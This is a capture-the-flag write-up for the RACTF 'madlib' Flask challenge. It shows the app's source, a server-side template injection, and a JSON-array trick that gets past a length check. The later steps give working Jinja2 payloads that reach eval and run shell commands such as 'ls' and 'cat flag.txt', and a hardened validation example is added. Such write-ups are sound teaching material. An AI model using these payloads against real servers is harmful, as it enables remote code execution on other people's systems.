RACTF

madlib

Last updated 3 years ago
1. Open the page and click "source" to get the source code

from flask import Flask, render_template_string, request, send_from_directory

app = Flask(__name__)

@app.route('/')
def index():
    return send_from_directory('html', 'index.html')

@app.route('/madlib', methods=['POST'])
def madlib():
    # Only the number of top-level JSON keys is checked, not the type of each value.
    if len(request.json) == 5:
        verb = request.json.get('verb')
        noun = request.json.get('noun')
        adjective = request.json.get('adjective')
        person = request.json.get('person')
        place = request.json.get('place')
        params = [verb, noun, adjective, person, place]
        # len() is applied to whatever JSON value arrived: for a list this counts elements, not characters.
        if any(len(i) > 21 for i in params):
            return 'your words must not be longer than 21 characters!', 403
        # User-controlled words are interpolated into the template *source* before rendering (SSTI).
        madlib = f'To find out what this is you must {verb} the internet then get to the {noun} system through the visual MAC hard drive and program the open-source but overriding the bus won\'t do anything so you need to parse the online SSD transmitter, then index the neural DHCP card {adjective}.{person} taught me this trick when we met in {place} allowing you to download the knowledge of what this is directly to your brain.'
        return render_template_string(madlib)
    return 'This madlib only takes five words', 403

@app.route('/source')
def show_source():
    return send_from_directory('/app/', 'app.py')

app.run('0.0.0.0', port=1337)

2. Fill in the fields and submit

3. Capture the request

4. Analyze the source code

From the source code this is clearly an SSTI challenge, and the following conditions must be met:

  • POST JSON data to /madlib

  • the JSON object has exactly 5 keys

  • the values of verb, noun, adjective, person and place (the params list) must each have a length no greater than 21

5. Test for SSTI

Entering {{3*8}} in the verb field outputs 24

6. Bypass the length check for RCE

I was stuck on this step for quite a while, then it occurred to me: since the data is JSON, can an array be nested inside it? I tried it and it does work.

The length limit is bypassed!
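To make the root cause of steps 4 and 6 concrete, here is an added example (not the challenge's code) that mirrors the original check, shows why a nested array slips past it, and contrasts it with a hardened version that type-checks each value and keeps user words out of the template source. The field names and 21-character limit come from the challenge; the fixed-template rendering via string.Template is an assumption standing in for render_template_string(TEMPLATE, **words).

```python
"""Hardened version of the madlib input check (added example, not the challenge's code)."""
from string import Template

FIELDS = ("verb", "noun", "adjective", "person", "place")
MAX_LEN = 21

# Fixed template: user words are substituted as data and never parsed as template syntax.
# In Flask the equivalent would be render_template_string(TEMPLATE, **words) with a
# template containing only {{ verb }}-style placeholders (assumed, not the challenge's code).
MADLIB = Template("To find out what this is you must $verb the internet then get to the "
                  "$noun system, then index the neural DHCP card $adjective. "
                  "$person taught me this trick when we met in $place.")


def vulnerable_check(payload):
    """Mirrors the challenge's logic: counts top-level keys, then len()s each value
    whatever its JSON type. A list ["<long string>", 2] has len() 2 and passes."""
    if len(payload) != 5:
        return False
    params = [payload.get(f) for f in FIELDS]
    return not any(len(i) > MAX_LEN for i in params)


def hardened_check(payload):
    """Returns the validated words dict, or None on rejection.
    Requires exactly the five expected keys, str values only, and applies the
    length limit to the string itself, so nested arrays are refused outright."""
    if not isinstance(payload, dict) or set(payload) != set(FIELDS):
        return None
    words = {}
    for field in FIELDS:
        value = payload[field]
        if not isinstance(value, str) or len(value) > MAX_LEN:
            return None
        words[field] = value
    return words


def render(words):
    """Substitute words into the fixed template; braces in a word stay literal text."""
    return MADLIB.substitute(words)
```

A string such as "{{3*8}}" submitted as a word survives render() unchanged, which is the observable difference between template data and template source.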

7. RCE

The string content can be placed in a GET parameter and read with request.args.<parameter name>:

POST /madlib?e=__import__('os').popen('ls').read()

{"verb":["{{().__class__.__bases__[0].__subclasses__()[64].__init__.__globals__['__builtins__']['eval'](request.args.e)}}",2],"noun":"456","adjective":"333","person":"444","place":"555"}

8. Get Flag

POST /madlib?e=__import__('os').popen('cat+flag.txt').read()

{"verb":["{{().__class__.__bases__[0].__subclasses__()[64].__init__.__globals__['__builtins__']['eval'](request.args.e)}}",2],"noun":"456","adjective":"333","person":"444","place":"555"}